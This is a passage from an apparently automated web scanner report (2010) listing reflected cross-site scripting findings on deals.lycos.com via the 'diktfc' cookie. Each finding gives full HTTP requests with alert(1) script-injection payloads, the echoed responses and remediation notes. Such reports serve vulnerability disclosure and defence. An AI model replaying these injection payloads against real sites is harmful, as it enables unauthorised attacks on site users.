Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3f1d2"%3balert(1)//3b0a90ac364; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17361
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3028"><script>alert(1)</script>900481f7494 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac3028"><script>alert(1)</script>900481f7494; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17384
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac3028"><script>alert(1)</script>900481f7494&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 298e6"%3balert(1)//fd955e4e72f was submitted in the diktfc cookie. This input was echoed as 298e6";alert(1)//fd955e4e72f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/dell-financial-services-25-off-laptops-more-414325 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A298e6"%3balert(1)//fd955e4e72f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18637
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e7bd"><script>alert(1)</script>9753846fcc9 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/dell-financial-services-25-off-laptops-more-414325 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2e7bd"><script>alert(1)</script>9753846fcc9; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:55 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18681
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/dell-financial-services-25-off-laptops-more-414325&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2e7bd"><script>alert(1)</script>9753846fcc9&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f572"><script>alert(1)</script>12d99f9dda4 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f572"><script>alert(1)</script>12d99f9dda4; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:29 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18863
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... //b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f572"><script>alert(1)</script>12d99f9dda4&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7b9b"%3balert(1)//d6f0902539e was submitted in the diktfc cookie. This input was echoed as e7b9b";alert(1)//d6f0902539e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae7b9b"%3balert(1)//d6f0902539e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:31 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18845
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35a58"><script>alert(1)</script>e26ae126c13 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A35a58"><script>alert(1)</script>e26ae126c13; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:35 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17609
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... ="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A35a58"><script>alert(1)</script>e26ae126c13&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a834a"%3balert(1)//5a3d78b4e4f was submitted in the diktfc cookie. This input was echoed as a834a";alert(1)//5a3d78b4e4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa834a"%3balert(1)//5a3d78b4e4f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:36 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17580
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b8b4"%3balert(1)//6666cd16315 was submitted in the diktfc cookie. This input was echoed as 3b8b4";alert(1)//6666cd16315 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b8b4"%3balert(1)//6666cd16315; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:41 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18637
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dfde"><script>alert(1)</script>8551183e611 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2dfde"><script>alert(1)</script>8551183e611; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:39 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18658
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2dfde"><script>alert(1)</script>8551183e611&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15d57"%3balert(1)//40027816f73 was submitted in the diktfc cookie. This input was echoed as 15d57";alert(1)//40027816f73 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/digital-blue-carabiner-digital-camera-for-3-413838 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A15d57"%3balert(1)//40027816f73; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:18 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18761
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82e75"><script>alert(1)</script>1d919f1ca71 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/digital-blue-carabiner-digital-camera-for-3-413838 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A82e75"><script>alert(1)</script>1d919f1ca71; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:16 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/digital-blue-carabiner-digital-camera-for-3-413838&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A82e75"><script>alert(1)</script>1d919f1ca71&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff58e"%3balert(1)//2eff680c602 was submitted in the diktfc cookie. This input was echoed as ff58e";alert(1)//2eff680c602 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/drawn-the-painted-tower-for-ipad-for-5-414364 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aff58e"%3balert(1)//2eff680c602; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:37 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16725
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6006c"><script>alert(1)</script>104c0231a35 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/drawn-the-painted-tower-for-ipad-for-5-414364 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6006c"><script>alert(1)</script>104c0231a35; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:36 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16698
